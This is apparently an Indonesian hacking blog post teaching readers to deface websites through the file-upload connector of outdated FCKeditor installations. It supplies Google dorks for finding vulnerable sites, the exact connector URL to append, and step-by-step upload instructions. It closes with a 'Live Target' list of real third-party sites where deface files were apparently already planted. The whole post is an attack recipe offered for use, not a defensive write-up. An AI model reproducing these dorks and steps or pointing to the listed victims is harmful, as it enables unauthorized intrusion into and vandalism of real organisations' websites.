Deface Website Metode FCKeditor
Penjelasan CKEditor
CKEditor adalah teks editor yang digunakan di lingkungan web. CKEditor adalah sebuah WYSIWYG editor, yang berarti teks yang diedit akan sama dengan yang akan tampil. Memakai CKEditor sebagai teks editor mirip seperti kita menggunakan Microsoft Word atau OpenOffice.
 |
| Script Deface ./Maniak_WiFi |
Ini merupakan tehnik yang mudah, namun agak ribet kalo belum tau alurnya, tetapi jika membaca tutornya dengan baik pasti akan lebih mudah, disini kita hanya upload file saja :D
Dork
Dorknya ini :P bisa di kembangin kok ;)inurl:/fckeditor/editor/filemanager/
inurl:/fckeditor/editor/filemanager/ site:.com
index of /fckeditor/editor/filemanager/connectors/
inurl /fckeditor/editor/filemanager/browser/default/browser.html
Exploit
Tambahkan Exploit ini dibelakang /browser.html.?Connector=connectors/php/connector.phpsehingga menjadi
?Type=File&Connector=connectors/php/connector.php
[ /fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php ]
Lihat Letak File
Untuk melihat telak file, tinggal klik kanan file yang terlah kita upload, kemudian pilih Inspect Element, dan copy linknya :DLangkah Deface Website Metode FCKeditor
1. Copy Dorknya Kemudian Paste and Search di Mbah Google, nanti banyak targetnya, pilih salah satu menurut feeling anda :p
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
2. Kemudian akan muncul tampilan seperti dibawah ini, lihatkan kosong :p, lihat urlnya. kemudian copy Exploitnya dan paste dibelakang /browser.html.
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
3. Jika website itu vuln maka akan muncul seperti dibawah ini, kemudian klik Browse untuk memilih file yang akan kita upload.
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
4. Pilih File ente, kemudian open saja.
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
5. Ok file sudah terpilih, langkah selanjutnya tinggal klik UPLOAD.
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
6. Ok file berhasil terupload, kalo kgx ada coba di reload lagi :D, Klik Kanan File.html kemudian pilih Inspect Element.
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
7. Lihat tanda panah, Itu adalah URLnya, copy saja, kemudian Paste dibelakang domain websitenya [.com .id .org dll].
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
8. Jadidah depes kita seperti ini :D
 |
| Deface Website Metode FCKeditor | File Upload Vulnerability |
Video Deface Website Metode FCKeditor
Deface Website Metode FCKeditor | File Upload Vulnerability
Live Target
Ini contoh web yang vuln :P
http://www.artegijon.com /UserFiles/File/-/mw.html
http://www.golfclubdecabourglehome.com/media/mw.txt
http://www.aventy.ru/Uploads/Images/file/mw.txt
http://www.simec.ind.br/conteudo/file/Pringsewu.jpg
http://www.hkia.net/UserFiles/Image/mw.html
http://www.domaine-soulanes.com/upload/Image/Pringsewu.jpg
http://www.ocsinc.com/public/images/Pringsewu.jpg
http://ust.edu/img/image/Pringsewu.jpg
http://www.maribor.si/UserFiles/Image/mw.html
http://www.trendline.ee/files/File/mw.html
http://www.edom.com.tw/userfiles/Image/mw.html
admin.balaton.cn/partner_contents/2681/Image/Pringsewu.jpg
http://www.indjaz-dz.com/news/upload/image/Pringsewu.jpg
http://www.japanesemountainretreat.com.au/files/editor_upload/File/mw.html
Download E-Book
Deface Website Metode FCKeditor | File Upload Vulnerability
[ DOWNLOAD ] - [ DOWNLOAD ]
\\ ::::::::::::::: || My Contact || ::::::::::::::: //
>> Facebook ** Abdur Rozak (Script Kiddie)
>> Twitter ** @JackTersakiti
>> Youtube ** Jack Tersakiti / Jack Show Off / Siti Nur Holida
>> Instagram ** jack_tersakiti
>> Instagram ** jack_holida
>> BBM ** 57318B69
>> LINE ** jack_tersakiti
>> E-Mail ** jack_tersakiti
// :::::::: || Why So Serious || ::::::::: \\
0 Komentar